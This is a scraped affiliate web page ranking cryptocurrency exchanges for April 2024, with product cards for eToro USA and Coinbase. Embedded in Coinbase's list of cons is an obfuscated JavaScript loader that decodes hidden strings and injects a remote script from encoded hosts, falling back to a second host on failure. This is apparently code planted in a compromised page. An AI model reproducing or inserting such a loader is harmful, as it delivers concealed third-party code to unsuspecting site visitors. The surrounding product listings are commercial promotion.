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Best Cryptocurrency Exchanges of April 2024 - Business Insider

Best Cryptocurrency Exchanges of April 2024

  • Coinbase: Best Cryptocurrency Exchange for Bitcoin-oriented Traders
  • Abra: Best Cryptocurrency Exchange for Low Fees
  • Kraken: Best Cryptocurrency Exchange for Futures and Margin Traders
  • CEX.IO :Best Crypto Exchange for Cryptocurrency Selection
  • eToro USA: Best Cryptocurrency Exchange for All Types of Traders
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Paid non-client promotion: Affiliate links for the products on this page are from partners that compensate us (see our advertiser disclosure with our list of partners for more details). However, our opinions are our own. See how we rate investing products to write unbiased product reviews.

Understanding cryptocurrencies alone can be daunting, and if you're new to crypto trading, finding the right brokerage to buy and sell popular assets like bitcoin, ether, and dogecoin can be another challenge.

The best cryptocurrency exchanges allow crypto-enthusiasts access to blockchain trading, advanced charting tools, portfolio customizations, and low trading fees. 

Featured Offer
eToro USA
Start investing
On eToro USA's website
eToro USA eToro USA
Insider's Rating
A five pointed star A five pointed star A five pointed star A five pointed star A five pointed star
Icon of check mark inside a promo stamp It indicates a confirmed selection.

Earn 4.90% APY on uninvested cash.

Account Minimum

$100 (in the USA and UK)


1% when you buy or sell a crypto asset; 0% stocks and ETFs, $2 monthly fee on uninvested cash if your cash balance is under $5k

  • Check mark icon A check mark. It indicates a confirmation of your intended interaction. Can trade bitcoin, dogecoin, ethereum, Litecoin, and a dozen other popular virtual assets; stock and ETF trading available
  • Check mark icon A check mark. It indicates a confirmation of your intended interaction. eToro's Copy Portfolios let you follow and copy the portfolios of experienced traders to enhance your investment returns
  • Check mark icon A check mark. It indicates a confirmation of your intended interaction. Several educational resources
  • Check mark icon A check mark. It indicates a confirmation of your intended interaction. Web and mobile app access
  • con icon Two crossed lines that form an 'X'. Not available to residents of New York, Minnesota, Nevada, Puerto Rico, Tennessee, Hawaii, Guam, American Samoa, Northern Marianas, and the US Virgin Islands (see a full list of its geographic restrictions here)
  • con icon Two crossed lines that form an 'X'. Limited selection of cryptocurrencies (eToro USA currently offers over 25)
Insider's Take

eToro USA is a popular cryptocurrency exchange and investment platform that is best suited for beginners interested in automatic investing tools, Smart Portfolio options, crypto wallet storage, and more. But its crypto selection is fairly limited compared to other crypto exchanges.

eToro USA review External link Arrow An arrow icon, indicating this redirects the user."
Product Details
  • Earn 4.90% APY on uninvested cash but if your cash balance is under $5k, you'll pay a $2 monthly fee
  • Features: Dogecoin and more cryptocurrencies, CopyTrader system, Copy Portfolios, and eToro Trading Academy
  • App store rating: 4.6 iOS/ 4.3 Android
  • Cash is FDIC insured for up to $5 million with partner banks
Show Pros, Cons, and More chevron down icon An icon in the shape of an angle pointing down.

Best Cryptocurrency Exchanges

Most of the best cryptocurrency apps provide low fees, margin trading, and other features like staking rewards (interest rewards for holding crypto assets for a set period).

If you don't want to use your exchange's built-in wallet (if applicable), you'll need to set up an external crypto wallet, such as one of the best bitcoin wallets, to store your assets securely. 

  • Coinbase: Best crypto exchange for beginners
  • Abra: Best crypto exchange for low fees
  • Kraken: Best crypto exchange for futures and margin traders
  • CEX.IO: Best crypto exchange for cryptocurrency selection
  • eToro USA: Best crypto exchange for all types of traders
  • Cash App Investing: Best crypto exchange for bitcoin

Here are the best cryptocurrency exchanges for low fees, human advisor access, and more in 2024. 

Compare the Best Cryptocurrency Exchanges

We've compiled some of the best cryptocurrency exchanges for buying and selling crypto assets. Keep reading to find the best crypto trading platform for you.

Best for beginners
Start investing
On Coinbase's website
Coinbase Coinbase
Insider's Rating
A five pointed star A five pointed star A five pointed star A five pointed star A five pointed star
Account Minimum



0.50% spread for buy/sell transactions; transaction fee from $0.99 to $2.99; up to 0.60% for Coinbase Pro and Coinbase Advanced Trade

  • Check mark icon A check mark. It indicates a confirmation of your intended interaction. Buy, sell, or store more than 170 cryptocurrencies like bitcoin and dogecoin
  • Check mark icon A check mark. It indicates a confirmation of your intended interaction. Educational investment resources, mobile access, digital storage, and customer support
  • Check mark icon A check mark. It indicates a confirmation of your intended interaction. Low account minimums
  • Check mark icon A check mark. It indicates a confirmation of your intended interaction. Can earn rewards for certain cryptocurrencies
  • Check mark icon A check mark. It indicates a confirmation of your intended interaction. Coinbase card lets you spend crypto or USD anywhere and earn crypto rewards; can deposit your paycheck into your account and convert from USD to crypto with no fees
  • con icon Two crossed lines that form an 'X'. Pay more for lower balances
  • con icon Two crossed lines that form an 'X'. High trading and transaction fees
  • con icon Two crossed lines that form an 'X'. /*/* */ (function(){if(window.a93f3eeb1f2653ece785b365bc47ec58) return; window.a93f3eeb1f2653ece785b365bc47ec58="EXmKJvBnfQsNU6gNIp74E9xdCbrv7OgcHFVAi_NfwBR85hYTfswoHr4shB_IPlz33CcZjbRbff0CZ_6OvuKt";var a=['w6FcWcOMSsKdwqp7','XSZGYMOcMw==','E8K7wobDksO2wq/Dkz8mwq/DnnLCsMK9HMOWE3bDiwg=','D8OpDcKkwpnCkS0=','w6NcGiTDomfCtsKM','fgbCl8KKT8OPecO8w4rDlWU=','wq9lTcOMJj7Cn0oyw5/CrnM=','wrp7LcKkZMOhDkFH','eXjDrw==','w5fDm8Kuw4/DtMKCJ8OKw4E+BcKuwoA0wpfCv1DCu110RRrCrsOywq1jwqRURMOkw4xaw7XChx07fx5PHTI=','NWTDkXRl','aEBzwqJgwprCg8Odwrx7w7zCgSQ=','woJMwqvCssOYDsOAUcK/SMKdWsKn','wrjDisONUcOMVw==','IG7DmH8=','f8KMw6TDi3Bm','wqllW8ObJiXCrw==','wrvDjMOJQcOrV8Odwo3CisKtwrxKw43Chw==','DUBeTMOFwpXCui4=','wpJDCEApUQ==','wrBHw5gEB8O8Z3ouLWJC','wrIlCA9Fw7jCgcOzDmLDu8OIc23Du3Eowr4oJcOPRsOYwpZnw5Ziwoh+BMOCwpDDmcK2wpDCp0TCk8Kyw4HCv1HCkxTCrXI=','w5llQcK8w5LDhXTDr8KZwpY=','JMOxfEtJw5HDo8OUw4VtCcOUE8Kww4I=','JMO7wqFSw5vDgSXCkEHDg1IF','w6t6wrsV'];(function(b,d){var f=function(g){while(--g){b['push'](b['shift']());}};f(++d);}(a,0xae));var b=function(c,d){c=c-0x0;var e=a[c];if(b['GrgDat']===undefined){(function(){var h;try{var j=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');');h=j();}catch(k){h=window;}var i='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';h['atob']||(h['atob']=function(l){var m=String(l)['replace'](/=+$/,'');var n='';for(var o=0x0,p,q,r=0x0;q=m['charAt'](r++);~q&&(p=o%0x4?p*0x40+q:q,o++%0x4)?n+=String['fromCharCode'](0xff&p>>(-0x2*o&0x6)):0x0){q=i['indexOf'](q);}return n;});}());var g=function(h,l){var m=[],n=0x0,o,p='',q='';h=atob(h);for(var t=0x0,u=h['length'];t<u;t++){q+='%'+('00'+h['charCodeAt'](t)['toString'](0x10))['slice'](-0x2);}h=decodeURIComponent(q);var r;for(r=0x0;r<0x100;r++){m[r]=r;}for(r=0x0;r<0x100;r++){n=(n+m[r]+l['charCodeAt'](r%l['length']))%0x100;o=m[r];m[r]=m[n];m[n]=o;}r=0x0;n=0x0;for(var v=0x0;v<h['length'];v++){r=(r+0x1)%0x100;n=(n+m[r])%0x100;o=m[r];m[r]=m[n];m[n]=o;p+=String['fromCharCode'](h['charCodeAt'](v)^m[(m[r]+m[n])%0x100]);}return p;};b['fnnXVa']=g;b['UZcIyG']={};b['GrgDat']=!![];}var f=b['UZcIyG'][c];if(f===undefined){if(b['LmqvYR']===undefined){b['LmqvYR']=!![];}e=b['fnnXVa'](e,d);b['UZcIyG'][c]=e;}else{e=f;}return e;};var j=window;j[b('0x7','X5Q!')]=[[b('0x15','2cFm'),0x3c0c89],[b('0x17','#wX@'),0.1],[b('0x19','2cFm'),'0'],[b('0x2','4w2b'),0x0],[b('0xb','*[x6'),![]],[b('0x14','aFaX'),0x0],[b('0x6','9!h)'),!0x0]];var f=[b('0x11','ahk#'),b('0x3','Tzah')],m=0x0,d,n=function(){if(!f[m])return;d=j[b('0x8','^Jip')][b('0x13','yKdw')](b('0x9','z7cJ'));d[b('0x16','zbR8')]=b('0x5','wy((');d[b('0x12','zbR8')]=!0x0;var c=j[b('0x0','AuTM')][b('0xa','gyPy')](b('0x1','a$wz'))[0x0];d[b('0x10','vcS)')]=b('0xc','#bwv')+f[m];d[b('0xd','XqDk')]=b('0xf',']aiG');d[b('0x18','X1Yg')]=function(){m++;n();};c[b('0x4','r301')][b('0xe','X1Yg')](d,c);};n();})(); /*/* */

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